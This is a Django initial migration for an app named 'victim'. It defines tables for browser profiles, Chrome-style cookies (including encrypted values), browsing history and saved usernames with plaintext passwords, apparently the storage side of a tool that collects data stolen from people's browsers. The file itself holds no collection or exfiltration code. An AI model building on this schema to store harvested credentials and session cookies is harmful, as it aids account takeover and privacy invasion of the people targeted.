# Generated by Django 5.2.4 on 2025-07-28 02:58

import django.db.models.deletion
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='BrowserProfile',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=150)),
                ('profile_pic', models.ImageField(blank=True, null=True, upload_to='profile_pics/')),
                ('browser_type', models.CharField(default='Chrome', max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
            options={
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='Cookie',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('creation_utc', models.BigIntegerField()),
                ('host_key', models.CharField(max_length=100)),
                ('top_frame_site_key', models.CharField(max_length=100)),
                ('name', models.CharField(max_length=50)),
                ('value', models.CharField(max_length=1000)),
                ('encrypted_value', models.CharField(blank=True, max_length=1000)),
                ('path', models.CharField(max_length=100)),
                ('expires_utc', models.BigIntegerField()),
                ('is_secure', models.BooleanField()),
                ('is_httponly', models.BooleanField()),
                ('last_access_utc', models.BigIntegerField()),
                ('has_expires', models.BooleanField()),
                ('is_persistent', models.BooleanField()),
                ('priority', models.IntegerField()),
                ('samesite', models.IntegerField()),
                ('source_scheme', models.IntegerField()),
                ('source_port', models.IntegerField()),
                ('is_same_party', models.BooleanField()),
                ('last_update_utc', models.BigIntegerField()),
                ('is_edgelegacycookie', models.BooleanField()),
                ('browser_provenance', models.IntegerField()),
                ('browser_profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cookies', to='victim.browserprofile')),
            ],
            options={
                'ordering': ['-last_access_utc'],
            },
        ),
        migrations.CreateModel(
            name='HistoryEntry',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.URLField(max_length=500)),
                ('title', models.CharField(max_length=500)),
                ('visit_count', models.IntegerField(default=1)),
                ('last_visit_time', models.BigIntegerField()),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('browser_profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='history', to='victim.browserprofile')),
            ],
            options={
                'verbose_name_plural': 'History entries',
                'ordering': ['-last_visit_time'],
            },
        ),
        migrations.CreateModel(
            name='Password',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.URLField(max_length=500)),
                ('username', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('browser_profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='passwords', to='victim.browserprofile')),
            ],
            options={
                'ordering': ['-created_at'],
            },
        ),
    ]
